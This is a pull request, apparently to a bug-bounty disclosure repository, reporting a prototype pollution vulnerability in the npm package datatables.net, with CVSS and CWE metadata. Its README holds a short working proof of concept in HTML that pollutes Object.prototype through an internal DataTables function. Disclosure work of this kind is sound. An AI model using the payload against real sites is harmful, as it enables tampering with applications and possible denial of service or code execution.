### PR TITLE
Prototype Pollution in datatables.net

### DIFF
--- a/bounties/npm/datatables.net/1/README.md
+++ b/bounties/npm/datatables.net/1/README.md
@@ -1,0 +1,20 @@
+# Description
+
+`datatables.net` is vulnerable to `Prototype Pollution`.
+This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
+
+
+# Proof of Concept
+
+The following two files are required to be served by an HTTP server.
+
+poc.html:
+<script src="https://code.jquery.com/jquery-3.5.1.js"></script>
+<script src="jquery.dataTables.js"></script>
+<script>
+    $.fn.dataTable.ext.internal._fnSetObjectDataFn('constructor.prototype.foo')({},'polluted');
+    document.write('foo : ' + foo);
+</script>
+
+jquery.dataTables.js:
+https://github.com/DataTables/Dist-DataTables/blob/master/js/jquery.dataTables.js

--- a/bounties/npm/datatables.net/1/vulnerability.json
+++ b/bounties/npm/datatables.net/1/vulnerability.json
@@ -1,0 +1,55 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-10-25",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "datatables.net",
+        "URL": "https://www.npmjs.com/package/datatables.net",
+        "Downloads": "248,614"
+    },
+    "CWEs": [
+        {
+            "ID": "471",
+            "Description": "Modification of Assumed-Immutable Data (MAID)"
+        }
+    ],
+    "CVSS":
+    {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "7.3"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/DataTables/Dist-DataTables",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "Allan Jardine",
+        "Name": "Allan Jardine",
+        "Forks": 19,
+        "Stars": 18
+    },
+    "Permalinks": [
+        "https://github.com/DataTables/Dist-DataTables/blob/master/js/jquery.dataTables.js#L2766"
+    ],
+    "References": []
+}


### PR DESCRIPTION
`datatables.net` is vulnerable to `Prototype Pollution`.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.